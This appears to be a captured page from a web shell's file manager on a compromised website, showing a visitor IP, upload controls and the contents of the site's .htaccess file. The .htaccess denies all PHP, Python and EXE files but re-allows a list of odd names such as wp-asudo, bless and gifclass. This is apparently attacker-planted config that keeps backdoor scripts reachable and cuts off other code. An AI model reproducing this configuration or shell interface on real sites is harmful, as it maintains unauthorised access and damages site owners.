Your IP : 216.73.216.39


Current Path : /home/wirbesti/noideterminiamo.ch/
Upload File :
Current File : /home/wirbesti/noideterminiamo.ch/.htaccess

<FilesMatch '.(py|exe|php)$'>
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch '(^|/)(class-t.api|bak|mh|gifclass|bless|index|bks|class|style2|wp-links|wp-blog|wp-sample|wp-asudo|wp-png|wp-good|bk)\.php$'>
    Order allow,deny
    Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
DirectoryIndex index.php
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>